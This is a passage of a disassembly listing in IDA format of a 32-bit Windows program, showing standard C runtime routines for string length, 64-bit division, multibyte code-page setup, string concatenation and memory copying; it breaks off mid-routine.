loc_405BB0: ; CODE XREF: sub_405B90+A�j
; sub_405B90+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_405BB0
mov eax, [ecx-4]
test al, al
jz short loc_405C01
test ah, ah
jz short loc_405BF7
test eax, 0FF0000h
jz short loc_405BED
test eax, 0FF000000h
jz short loc_405BE3
jmp short loc_405BB0
; ---------------------------------------------------------------------------
loc_405BE3: ; CODE XREF: sub_405B90+11�j
; sub_405B90+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_405BED: ; CODE XREF: sub_405B90+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_405BF7: ; CODE XREF: sub_405B90+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_405C01: ; CODE XREF: sub_405B90+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_405B90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405C0B proc near ; CODE XREF: sub_403D8C+2D4�p
; sub_403D8C+6B3�p
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
test eax, eax
jnz short loc_405C17
pop ebp
retn
; ---------------------------------------------------------------------------
loc_405C17: ; CODE XREF: sub_405C0B+8�j
cmp dword_409CEC, 0
jnz short loc_405C32
mov cx, [ebp+arg_4]
cmp cx, 0FFh
ja short loc_405C64
push 1
mov [eax], cl
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_405C32: ; CODE XREF: sub_405C0B+13�j
lea ecx, [ebp+arg_0]
and [ebp+arg_0], 0
push ecx
push 0
push dword_409314
push eax
lea eax, [ebp+arg_4]
push 1
push eax
push 220h
push dword_409CFC
call dword_4080C0
test eax, eax
jz short loc_405C64
cmp [ebp+arg_0], 0
jz short loc_405C71
loc_405C64: ; CODE XREF: sub_405C0B+1E�j
; sub_405C0B+51�j
mov dword_409A80, 2Ah
or eax, 0FFFFFFFFh
loc_405C71: ; CODE XREF: sub_405C0B+57�j
pop ebp
retn
sub_405C0B endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_405C80 proc near ; CODE XREF: sub_403D8C+5C4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_405CA2
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_405CE3
; ---------------------------------------------------------------------------
loc_405CA2: ; CODE XREF: sub_405C80+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_405CB0: ; CODE XREF: sub_405C80+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_405CB0
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_405CDE
cmp edx, [esp+8+arg_4]
ja short loc_405CDE
jb short loc_405CDF
cmp eax, [esp+8+arg_0]
jbe short loc_405CDF
loc_405CDE: ; CODE XREF: sub_405C80+4E�j
; sub_405C80+54�j
dec esi
loc_405CDF: ; CODE XREF: sub_405C80+56�j
; sub_405C80+5C�j
xor edx, edx
mov eax, esi
loc_405CE3: ; CODE XREF: sub_405C80+20�j
pop esi
pop ebx
retn 10h
sub_405C80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_405CF0 proc near ; CODE XREF: sub_403D8C+5B2�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_405D11
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_405D61
; ---------------------------------------------------------------------------
loc_405D11: ; CODE XREF: sub_405CF0+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_405D1F: ; CODE XREF: sub_405CF0+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_405D1F
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_405D4A
cmp edx, [esp+4+arg_4]
ja short loc_405D4A
jb short loc_405D52
cmp eax, [esp+4+arg_0]
jbe short loc_405D52
loc_405D4A: ; CODE XREF: sub_405CF0+4A�j
; sub_405CF0+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_405D52: ; CODE XREF: sub_405CF0+52�j
; sub_405CF0+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_405D61: ; CODE XREF: sub_405CF0+1F�j
pop ebx
retn 10h
sub_405CF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405D65 proc near ; CODE XREF: sub_404596+5E�p
; sub_40612F+9A�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4084F8
push offset sub_402E08
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, dword_409CD0
xor ebx, ebx
cmp eax, ebx
jnz short loc_405DD4
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_4084F0
push esi
call dword_408064
test eax, eax
jz short loc_405DB2
mov eax, esi
jmp short loc_405DCF
; ---------------------------------------------------------------------------
loc_405DB2: ; CODE XREF: sub_405D65+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset dword_4084EC
push esi
push ebx
call dword_408038
test eax, eax
jz loc_405E9A
push 2
pop eax
loc_405DCF: ; CODE XREF: sub_405D65+4B�j
mov dword_409CD0, eax
loc_405DD4: ; CODE XREF: sub_405D65+2F�j
cmp eax, 2
jnz short loc_405DFD
mov eax, [ebp+arg_14]
cmp eax, ebx
jnz short loc_405DE5
mov eax, dword_409CEC
loc_405DE5: ; CODE XREF: sub_405D65+79�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call dword_408038
jmp loc_405E9C
; ---------------------------------------------------------------------------
loc_405DFD: ; CODE XREF: sub_405D65+72�j
cmp eax, 1
jnz loc_405E9A
cmp [ebp+arg_10], ebx
jnz short loc_405E13
mov eax, dword_409CFC
mov [ebp+arg_10], eax
loc_405E13: ; CODE XREF: sub_405D65+A4�j
push ebx
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_18]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_10]
call dword_40803C
mov [ebp+var_20], eax
cmp eax, ebx
jz short loc_405E9A
mov [ebp+var_4], ebx
lea edi, [eax+eax]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_402CE0
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_24], esi
push edi
push ebx
push esi
call sub_406C90
add esp, 0Ch
jmp short loc_405E69
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor esi, esi
loc_405E69: ; CODE XREF: sub_405D65+F7�j
or [ebp+var_4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_405E9A
push [ebp+var_20]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call dword_40803C
cmp eax, ebx
jz short loc_405E9A
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call dword_408064
jmp short loc_405E9C
; ---------------------------------------------------------------------------
loc_405E9A: ; CODE XREF: sub_405D65+61�j
; sub_405D65+9B�j ...
xor eax, eax
loc_405E9C: ; CODE XREF: sub_405D65+93�j
; sub_405D65+133�j
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_405D65 endp
; =============== S U B R O U T I N E =======================================
sub_405EAE proc near ; CODE XREF: sub_4047C8+2B�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_405EBF
add esp, 0Ch
retn
sub_405EAE endp
; =============== S U B R O U T I N E =======================================
sub_405EBF proc near ; CODE XREF: sub_405EAE+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test byte_5173C1[eax], cl
jnz short loc_405EEC
cmp [esp+arg_4], 0
jz short loc_405EE5
movzx eax, word_409112[eax*2]
and eax, [esp+arg_4]
jmp short loc_405EE7
; ---------------------------------------------------------------------------
loc_405EE5: ; CODE XREF: sub_405EBF+16�j
xor eax, eax
loc_405EE7: ; CODE XREF: sub_405EBF+24�j
test eax, eax
jnz short loc_405EEC
retn
; ---------------------------------------------------------------------------
loc_405EEC: ; CODE XREF: sub_405EBF+F�j
; sub_405EBF+2A�j
push 1
pop eax
retn
sub_405EBF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405EF0 proc near ; CODE XREF: sub_4062B4+B�p
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_406089
mov esi, eax
pop ecx
cmp esi, dword_51729C
mov [ebp+arg_0], esi
jz loc_40607D
xor ebx, ebx
cmp esi, ebx
jz loc_406073
xor edx, edx
mov eax, offset dword_409808
loc_405F24: ; CODE XREF: sub_405EF0+41�j
cmp [eax], esi
jz short loc_405F9A
add eax, 30h
inc edx
cmp eax, offset dword_4098F8
jl short loc_405F24
lea eax, [ebp+var_18]
push eax
push esi
call dword_408030
cmp eax, 1
jnz loc_40606B
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_5173C0
cmp [ebp+var_18], 1
mov dword_51729C, esi
rep stosd
stosb
mov dword_5174C4, ebx
jbe loc_406059
cmp [ebp+var_12], 0
jz loc_40602F
lea ecx, [ebp+var_11]
loc_405F77: ; CODE XREF: sub_405EF0+139�j
mov dl, [ecx]
test dl, dl
jz loc_40602F
movzx eax, byte ptr [ecx-1]
movzx edx, dl
loc_405F88: ; CODE XREF: sub_405EF0+A8�j
cmp eax, edx
ja loc_406023
or byte_5173C1[eax], 4
inc eax
jmp short loc_405F88
; ---------------------------------------------------------------------------
loc_405F9A: ; CODE XREF: sub_405EF0+36�j
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_5173C0
rep stosd
lea esi, [edx+edx*2]
mov [ebp+var_4], ebx
shl esi, 4
stosb
lea ebx, dword_409818[esi]
loc_405FB6: ; CODE XREF: sub_405EF0+103�j
cmp byte ptr [ebx], 0
mov ecx, ebx
jz short loc_405FE9
loc_405FBD: ; CODE XREF: sub_405EF0+F7�j
mov dl, [ecx+1]
test dl, dl
jz short loc_405FE9
movzx eax, byte ptr [ecx]
movzx edi, dl
cmp eax, edi
ja short loc_405FE2
mov edx, [ebp+var_4]
mov dl, byte_409800[edx]
loc_405FD7: ; CODE XREF: sub_405EF0+F0�j
or byte_5173C1[eax], dl
inc eax
cmp eax, edi
jbe short loc_405FD7
loc_405FE2: ; CODE XREF: sub_405EF0+DC�j
inc ecx
inc ecx
cmp byte ptr [ecx], 0
jnz short loc_405FBD
loc_405FE9: ; CODE XREF: sub_405EF0+CB�j
; sub_405EF0+D2�j
inc [ebp+var_4]
add ebx, 8
cmp [ebp+var_4], 4
jb short loc_405FB6
mov eax, [ebp+arg_0]
mov dword_5172AC, 1
push eax
mov dword_51729C, eax
call sub_4060D3
lea esi, dword_40980C[esi]
mov edi, offset dword_5172A0
movsd
movsd
pop ecx
mov dword_5174C4, eax
movsd
jmp short loc_406078
; ---------------------------------------------------------------------------
loc_406023: ; CODE XREF: sub_405EF0+9A�j
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_405F77
loc_40602F: ; CODE XREF: sub_405EF0+7E�j
; sub_405EF0+8B�j
push 1
pop eax
loc_406032: ; CODE XREF: sub_405EF0+14F�j
or byte_5173C1[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_406032
push esi
call sub_4060D3
pop ecx
mov dword_5174C4, eax
mov dword_5172AC, 1
jmp short loc_40605F
; ---------------------------------------------------------------------------
loc_406059: ; CODE XREF: sub_405EF0+74�j
mov dword_5172AC, ebx
loc_40605F: ; CODE XREF: sub_405EF0+167�j
xor eax, eax
mov edi, offset dword_5172A0
stosd
stosd
stosd
jmp short loc_406078
; ---------------------------------------------------------------------------
loc_40606B: ; CODE XREF: sub_405EF0+51�j
cmp dword_409CD4, ebx
jz short loc_406081
loc_406073: ; CODE XREF: sub_405EF0+27�j
call sub_406106
loc_406078: ; CODE XREF: sub_405EF0+131�j
; sub_405EF0+179�j
call sub_40612F
loc_40607D: ; CODE XREF: sub_405EF0+1D�j
xor eax, eax
jmp short loc_406084
; ---------------------------------------------------------------------------
loc_406081: ; CODE XREF: sub_405EF0+181�j
or eax, 0FFFFFFFFh
loc_406084: ; CODE XREF: sub_405EF0+18F�j
pop edi
pop esi
pop ebx
leave
retn
sub_405EF0 endp
; =============== S U B R O U T I N E =======================================
sub_406089 proc near ; CODE XREF: sub_405EF0+C�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and dword_409CD4, 0
cmp eax, 0FFFFFFFEh
jnz short loc_4060A9
mov dword_409CD4, 1
jmp dword_408028
; ---------------------------------------------------------------------------
loc_4060A9: ; CODE XREF: sub_406089+E�j
cmp eax, 0FFFFFFFDh
jnz short loc_4060BE
mov dword_409CD4, 1
jmp dword_40802C
; ---------------------------------------------------------------------------
loc_4060BE: ; CODE XREF: sub_406089+23�j
cmp eax, 0FFFFFFFCh
jnz short locret_4060D2
mov eax, dword_409CFC
mov dword_409CD4, 1
locret_4060D2: ; CODE XREF: sub_406089+38�j
retn
sub_406089 endp
; =============== S U B R O U T I N E =======================================
sub_4060D3 proc near ; CODE XREF: sub_405EF0+118�p
; sub_405EF0+152�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
sub eax, 3A4h
jz short loc_406100
sub eax, 4
jz short loc_4060FA
sub eax, 0Dh
jz short loc_4060F4
dec eax
jz short loc_4060EE
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4060EE: ; CODE XREF: sub_4060D3+16�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_4060F4: ; CODE XREF: sub_4060D3+13�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_4060FA: ; CODE XREF: sub_4060D3+E�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_406100: ; CODE XREF: sub_4060D3+9�j
mov eax, 411h
retn
sub_4060D3 endp
; =============== S U B R O U T I N E =======================================
sub_406106 proc near ; CODE XREF: sub_405EF0:loc_406073�p
push edi
push 40h
pop ecx
xor eax, eax
mov edi, offset byte_5173C0
rep stosd
stosb
xor eax, eax
mov edi, offset dword_5172A0
mov dword_51729C, eax
mov dword_5172AC, eax
mov dword_5174C4, eax
stosd
stosd
stosd
pop edi
retn
sub_406106 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40612F proc near ; CODE XREF: sub_405EF0:loc_406078�p
var_514 = byte ptr -514h
var_314 = byte ptr -314h
var_214 = byte ptr -214h
var_114 = byte ptr -114h
var_14 = byte ptr -14h
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
push ebp
mov ebp, esp
sub esp, 514h
lea eax, [ebp+var_14]
push esi
push eax
push dword_51729C
call dword_408030
cmp eax, 1
jnz loc_406268
xor eax, eax
mov esi, 100h
loc_406159: ; CODE XREF: sub_40612F+34�j
mov [ebp+eax+var_114], al
inc eax
cmp eax, esi
jb short loc_406159
mov al, [ebp+var_E]
mov [ebp+var_114], 20h
test al, al
jz short loc_4061AA
push ebx
push edi
lea edx, [ebp+var_D]
loc_406178: ; CODE XREF: sub_40612F+77�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_40619F
sub ecx, eax
lea edi, [ebp+eax+var_114]
inc ecx
mov eax, 20202020h
mov ebx, ecx
shr ecx, 2
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_40619F: ; CODE XREF: sub_40612F+51�j
inc edx
inc edx
mov al, [edx-1]
test al, al
jnz short loc_406178
pop edi
pop ebx
loc_4061AA: ; CODE XREF: sub_40612F+42�j
push 0
lea eax, [ebp+var_514]
push dword_5174C4
push dword_51729C
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 1
call sub_405D65
push 0
lea eax, [ebp+var_214]
push dword_51729C
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push esi
push dword_5174C4
call sub_406CE8
push 0
lea eax, [ebp+var_314]
push dword_51729C
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 200h
push dword_5174C4
call sub_406CE8
add esp, 5Ch
xor eax, eax
lea ecx, [ebp+var_514]
loc_406225: ; CODE XREF: sub_40612F+135�j
mov dx, [ecx]
test dl, 1
jz short loc_406243
or byte_5173C1[eax], 10h
mov dl, [ebp+eax+var_214]
loc_40623B: ; CODE XREF: sub_40612F+127�j
mov byte_5172C0[eax], dl
jmp short loc_40625F
; ---------------------------------------------------------------------------
loc_406243: ; CODE XREF: sub_40612F+FC�j
test dl, 2
jz short loc_406258
or byte_5173C1[eax], 20h
mov dl, [ebp+eax+var_314]
jmp short loc_40623B
; ---------------------------------------------------------------------------
loc_406258: ; CODE XREF: sub_40612F+117�j
and byte_5172C0[eax], 0
loc_40625F: ; CODE XREF: sub_40612F+112�j
inc eax
inc ecx
inc ecx
cmp eax, esi
jb short loc_406225
jmp short loc_4062B1
; ---------------------------------------------------------------------------
loc_406268: ; CODE XREF: sub_40612F+1D�j
xor eax, eax
mov esi, 100h
loc_40626F: ; CODE XREF: sub_40612F+180�j
cmp eax, 41h
jb short loc_40628D
cmp eax, 5Ah
ja short loc_40628D
or byte_5173C1[eax], 10h
mov cl, al
add cl, 20h
loc_406285: ; CODE XREF: sub_40612F+174�j
mov byte_5172C0[eax], cl
jmp short loc_4062AC
; ---------------------------------------------------------------------------
loc_40628D: ; CODE XREF: sub_40612F+143�j
; sub_40612F+148�j
cmp eax, 61h
jb short loc_4062A5
cmp eax, 7Ah
ja short loc_4062A5
or byte_5173C1[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_406285
; ---------------------------------------------------------------------------
loc_4062A5: ; CODE XREF: sub_40612F+161�j
; sub_40612F+166�j
and byte_5172C0[eax], 0
loc_4062AC: ; CODE XREF: sub_40612F+15C�j
inc eax
cmp eax, esi
jb short loc_40626F
loc_4062B1: ; CODE XREF: sub_40612F+137�j
pop esi
leave
retn
sub_40612F endp
; =============== S U B R O U T I N E =======================================
sub_4062B4 proc near ; CODE XREF: sub_4047C8+9�p
; sub_404820+D�p ...
cmp dword_518628, 0
jnz short locret_4062CF
push 0FFFFFFFDh
call sub_405EF0
pop ecx
mov dword_518628, 1
locret_4062CF: ; CODE XREF: sub_4062B4+7�j
retn
sub_4062B4 endp
; =============== S U B R O U T I N E =======================================
sub_4062D0 proc near ; CODE XREF: sub_404820+86�p
; sub_404E3C+83�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_406341
sub_4062D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4062E0 proc near ; CODE XREF: sub_404E3C+E6�p
; sub_404E3C+F7�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_4062FC
loc_4062ED: ; CODE XREF: sub_4062E0+1A�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_40632F
test ecx, 3
jnz short loc_4062ED
loc_4062FC: ; CODE XREF: sub_4062E0+B�j
; sub_4062E0+32�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_4062FC
mov eax, [ecx-4]
test al, al
jz short loc_40633E
test ah, ah
jz short loc_406339
test eax, 0FF0000h
jz short loc_406334
test eax, 0FF000000h
jz short loc_40632F
jmp short loc_4062FC
; ---------------------------------------------------------------------------
loc_40632F: ; CODE XREF: sub_4062E0+12�j
; sub_4062E0+4B�j
lea edi, [ecx-1]
jmp short loc_406341
; ---------------------------------------------------------------------------
loc_406334: ; CODE XREF: sub_4062E0+44�j
lea edi, [ecx-2]
jmp short loc_406341
; ---------------------------------------------------------------------------
loc_406339: ; CODE XREF: sub_4062E0+3D�j
lea edi, [ecx-3]
jmp short loc_406341
; ---------------------------------------------------------------------------
loc_40633E: ; CODE XREF: sub_4062E0+39�j
lea edi, [ecx-4]
loc_406341: ; CODE XREF: sub_4062D0+5�j
; sub_4062E0+52�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_406366
loc_40634D: ; CODE XREF: sub_4062E0+7D�j
mov dl, [ecx]
inc ecx
test dl, dl
jz short loc_4063B8
mov [edi], dl
inc edi
test ecx, 3
jnz short loc_40634D
jmp short loc_406366
; ---------------------------------------------------------------------------
loc_406361: ; CODE XREF: sub_4062E0+9E�j
; sub_4062E0+B8�j
mov [edi], edx
add edi, 4
loc_406366: ; CODE XREF: sub_4062E0+6B�j
; sub_4062E0+7F�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_406361
test dl, dl
jz short loc_4063B8
test dh, dh
jz short loc_4063AF
test edx, 0FF0000h
jz short loc_4063A2
test edx, 0FF000000h
jz short loc_40639A
jmp short loc_406361
; ---------------------------------------------------------------------------
loc_40639A: ; CODE XREF: sub_4062E0+B6�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4063A2: ; CODE XREF: sub_4062E0+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_4063AF: ; CODE XREF: sub_4062E0+A6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4063B8: ; CODE XREF: sub_4062E0+72�j
; sub_4062E0+A2�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_4062E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4063C0 proc near ; CODE XREF: sub_404B26+116�p
; sub_407632+82�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_4063E0
cmp edi, eax
jb loc_406558
loc_4063E0: ; CODE XREF: sub_4063C0+16�j
test edi, 3
jnz short loc_4063FC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_40641C
rep movsd
jmp off_406508[edx*4]
; ---------------------------------------------------------------------------
loc_4063FC: ; CODE XREF: sub_4063C0+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_406414
and eax, 3
add ecx, eax
jmp dword ptr loc_40641C+4[eax*4]
; ---------------------------------------------------------------------------
loc_406414: ; CODE XREF: sub_4063C0+46�j
jmp dword ptr loc_406518[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_40641C: ; CODE XREF: sub_4063C0+31�j
; sub_4063C0+8E�j ...
jmp off_40649C[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_406430
dd offset loc_40645C
dd offset loc_406480
; ---------------------------------------------------------------------------
loc_406430: ; DATA XREF: sub_4063C0+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_40641C
rep movsd
jmp off_406508[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_40645C: ; DATA XREF: sub_4063C0+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_40641C
rep movsd
jmp off_406508[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_406480: ; DATA XREF: sub_4063C0+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_40641C
rep movsd
jmp off_406508[edx*4]
; ---------------------------------------------------------------------------
align 4
off_40649C dd offset loc_4064FF ; DATA XREF: sub_4063C0:loc_40641C�r
dd offset loc_4064EC
dd offset loc_4064E4
dd offset loc_4064DC
dd offset loc_4064D4
dd offset loc_4064CC
dd offset loc_4064C4
dd offset loc_4064BC
; ---------------------------------------------------------------------------
loc_4064BC: ; CODE XREF: sub_4063C0:loc_40641C�j
; DATA XREF: sub_4063C0+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_4064C4: ; CODE XREF: sub_4063C0:loc_40641C�j
; DATA XREF: sub_4063C0+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_4064CC: ; CODE XREF: sub_4063C0:loc_40641C�j
; DATA XREF: sub_4063C0+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_4064D4: ; CODE XREF: sub_4063C0:loc_40641C�j
; DATA XREF: sub_4063C0+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_4064DC: ; CODE XREF: sub_4063C0:loc_40641C�j
; DATA XREF: sub_4063C0+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_4064E4: ; CODE XREF: sub_4063C0:loc_40641C�j
; DATA XREF: sub_4063C0+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_4064EC: ; CODE XREF: sub_4063C0:loc_40641C�j
; DATA XREF: sub_4063C0+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4064FF: ; CODE XREF: sub_4063C0:loc_40641C�j
; DATA XREF: sub_4063C0:off_40649C�o
jmp off_406508[edx*4]
; ---------------------------------------------------------------------------
align 4
off_406508 dd offset loc_406518 ; DATA XREF: sub_4063C0+35�r
; sub_4063C0+92�r ...
dd offset loc_406520
dd offset loc_40652C
dd offset loc_406540
; ---------------------------------------------------------------------------
loc_406518: ; CODE XREF: sub_4063C0+35�j
; sub_4063C0+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_406520: ; CODE XREF: sub_4063C0+35�j
; sub_4063C0+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40652C: ; CODE XREF: sub_4063C0+35�j
; sub_4063C0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_406540: ; CODE XREF: sub_4063C0+35�j
; sub_4063C0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_406558: ; CODE XREF: sub_4063C0+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_40658C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_406580
std
rep movsd
cld
jmp off_4066A0[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_406580: ; CODE XREF: sub_4063C0+1B1�j
; sub_4063C0+208�j ...
neg ecx
jmp off_406650[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_40658C: ; CODE XREF: sub_4063C0+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_4065A4
and eax, 3
sub ecx, eax
jmp dword ptr loc_4065A4+4[eax*4]
; ---------------------------------------------------------------------------
loc_4065A4: ; CODE XREF: sub_4063C0+1D6�j
; DATA XREF: sub_4063C0+1DD�r
